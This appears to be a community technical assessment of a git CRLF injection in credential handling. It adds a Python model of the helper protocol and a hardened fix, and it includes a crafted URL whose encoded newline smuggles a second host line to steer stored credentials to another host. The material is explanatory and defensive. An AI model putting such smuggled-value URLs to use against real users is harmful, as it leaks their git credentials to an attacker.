Green-m
Technical Analysis

The exploitability is very easy

This vuln is just a CRLF injection in my opinion.

You could offer a URL like https://one.example.com?%0ahost=two.example.com/, so that the credential would be sent to two.example.com, which the attacker owns.

The value is limited

I guess there are some prerequisites for the attack:

  • A subdomain name that has the same main domain name as the target.

  • The victim stores or caches the credentials (it's not the default behavior).

  • It may need user interaction. The exploit usually occurs when the user runs git clone <URL>.

That's why I think the value for the attacker is low.

Another interesting scenario

This vuln probably affects apps and services based on git, like GitLab (not including GitLab).

These services may allow users to import or remotely clone a repo, and that is where this vuln would occur.

Original patch

https://github.com/git/git/commit/9a6bbee8006c24b46a85d29e7b38cfa79e9ab21b

Fix and workaround

See https://github.com/git/git/security/advisories/GHSA-qm7j-c969-7j4q

This is my first comment in this awesome AttackerKB community; discussion and helpful advice are welcome.
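As an added example, not code from the post above or from git itself: a small Python model of the git credential-helper protocol that shows why the URL in the assessment is a CRLF injection. A credential request is a stream of key=value lines; if the URL's host is percent-decoded and written into that stream without checking for newlines, the %0a in https://one.example.com?%0ahost=two.example.com/ becomes a second host= line that overrides the first, and the helper hands back the password stored for two.example.com. The credential store, the parsing helpers and the hardened serializer (refusing newline-bearing fields and requiring protocol and host) are constructed simplifications and assumptions for illustration, not git's implementation.

```python
from urllib.parse import unquote

# Constructed credential store, standing in for what a helper such as
# git-credential-store might hold for the victim. Keyed by (protocol, host).
STORE = {
    ("https", "two.example.com"): ("alice", "s3cret"),
}


def parse_url_naive(url):
    """Split a URL into (protocol, host, path) the way a minimal credential
    writer might. Simplified model, not git's credential_from_url: the host is
    everything up to the first '/', userinfo is dropped, and the host is
    percent-decoded, which is what turns %0a into a real newline."""
    proto, sep, rest = url.partition("://")
    if not sep:
        raise ValueError("no protocol in URL")
    hostpart, _, path = rest.partition("/")
    if "@" in hostpart:
        _, _, hostpart = hostpart.rpartition("@")
    return proto, unquote(hostpart), path


def serialize_naive(proto, host):
    """Vulnerable writer: emits the helper protocol stream with no validation."""
    return f"protocol={proto}\nhost={host}\n\n"


def serialize_hardened(proto, host):
    """Hardened writer (assumed, in the spirit of the fix): refuse to operate
    without protocol and host, and refuse any field that contains a newline,
    since a newline in a value is indistinguishable from a new key=value line."""
    if not proto or not host:
        raise ValueError("refusing to operate without protocol and host")
    for value in (proto, host):
        if "\n" in value or "\r" in value:
            raise ValueError("newline in credential field")
    return f"protocol={proto}\nhost={host}\n\n"


def helper_lookup(stream, store=STORE):
    """Parse the stream as a helper would: one key=value per line until a blank
    line, later keys overwrite earlier ones. Returns (user, password) or None."""
    fields = {}
    for line in stream.split("\n"):
        if not line:
            break
        key, sep, value = line.partition("=")
        if sep:
            fields[key] = value
    return store.get((fields.get("protocol"), fields.get("host")))


def vulnerable_flow(url):
    """URL -> naive stream -> helper lookup."""
    proto, host, _ = parse_url_naive(url)
    return helper_lookup(serialize_naive(proto, host))


def hardened_flow(url):
    """URL -> hardened stream -> helper lookup; raises ValueError on injection."""
    proto, host, _ = parse_url_naive(url)
    return helper_lookup(serialize_hardened(proto, host))


def hardened_rejects(url):
    """True if the hardened writer refuses to build a request for this URL."""
    try:
        hardened_flow(url)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    evil = "https://one.example.com?%0ahost=two.example.com/"
    proto, host, _ = parse_url_naive(evil)
    print(repr(serialize_naive(proto, host)))   # shows the injected host= line
    print(vulnerable_flow(evil))                # credentials stored for two.example.com
    print(hardened_rejects(evil))               # True
```

The vulnerable stream for the crafted URL reads protocol=https, host=one.example.com?, host=two.example.com; the helper keeps the last host= and returns the credential for two.example.com even though the request was built for one.example.com. The hardened writer never emits that stream, which is the same shape of check as the git fix linked in the assessment.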